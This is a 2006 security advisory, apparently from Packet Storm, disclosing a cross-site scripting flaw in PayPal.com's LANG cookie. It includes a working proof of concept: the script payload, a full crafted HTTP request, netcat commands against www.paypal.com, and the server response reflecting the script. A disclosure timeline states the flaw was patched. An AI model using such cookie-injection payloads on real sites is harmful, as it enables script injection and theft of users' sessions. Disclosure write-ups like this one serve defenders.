paypalXSScorry.txt

2006-11-07T00:00:00
ID PACKETSTORM:51719
Type packetstorm
Reporter CorryL
Modified 2006-11-07T00:00:00

Description

                                        
                                            `  
-=[--------------------ADVISORY-------------------]=-  
  
PayPal.com  
  
Author:CorryL x0n3-h4ck.org  
-=[----------------------------------------------------]=-  
  
  
-=[+] Application: PayPal.com  
-=[+] Version:   
-=[+] Vendor's URL: www.paypal.com  
-=[+] Platform: Linux\Unix  
-=[+] Bug type: XSS  
-=[+] Exploitation: Remote/Local  
-=[-]  
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~  
-=[+] Reference: www.x0n3-h4ck.org  
-=[+] Virtual Office: http://www.kasamba.com/CorryL  
  
..::[ Descriprion ]::..  
  
Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution.  
  
PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal.   
  
  
..::[ Proof Of Concept ]::..  
  
The problem is in a contained variable on the cookies that come  
saved on a system client,  
I have used a small software "NetCat" for the dispatch of the application  
to the web containing server the lace,  
what it would allow the xss.  
  
I have used a line of code that visualizes a small window of  
containing alert of the numbers.  
  
<ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>  
  
I have passed to the varying LANG in this way:  
  
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>  
  
this is a request, that I have passed server to the web, complete of the  
code that would allow the xss:  
  
GET / HTTP/1.0  
Accept: */*  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
Host: www.paypal.com  
Cookie:  
cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206  
4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202  
067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747  
3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202  
0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h  
PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL  
N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@address.com;p  
pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa  
j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy  
i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4  
rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t  
est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI  
VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951  
1214ENDREJECT  
Connection: Close  
Pragma: no-cache  
  
following I glue the answer of the server:  
  
nc www.paypal.com 80 < prova.txt  
  
  
HTTP/1.1 200 OK  
Date: Fri, 06 Oct 2006 17:23:13 GMT  
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22  
OpenSSL/0.9.7e  
Cache-Control: private  
Expires: Thu, 05 Jan 1995 22:00:00 GMT  
Pragma: no-cache  
Set-Cookie:  
feel_cookie=61203020206220302020632036207765627363722064203620776562  
736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312  
0686F6D65  
706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0  
D3E616C65  
72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206  
920313920  
702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657  
82D6F7574  
73696465206B203020206C2031362057656C636F6D65202D2050617950616C20;  
expires=Sat, 0  
6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com  
Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/;  
expires=Sun, 28-Sep  
-36 17:23:13 GMT  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">  
<html>  
<head>  
<!--  
Script info: script: webscr, cmd: , template: p/wel/index-outside,  
date: Oct.  
3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt>  
web version: 42.0-255538 branch: live-420_int  
content version: 42.0-249796 branch: live-420_int  
-->  
<title>PayPal - Abort</title>  
  
As he is able well to see the server responds and it inserts the line of  
code among the output of the page, allowing the opening  
of the window of alert.  
  
  
We can save the answer of the server on a page in formed html  
and to open her/it with an any browsers to ascertain how much I dictate,  
using same NetCat, in this way:  
  
nc www.paypal.com 80 < test.txt > aaa.html  
  
  
  
  
..::[ Disclousure Timeline ]::..  
  
[04/10/2006] - Vendor notification  
[08/10/2006] - Vendor Response  
[18/10/2006] - Patch relase from vendor  
[04/11/2006] - Public disclousure  
  
  
  
*********************  
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!  
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html   
`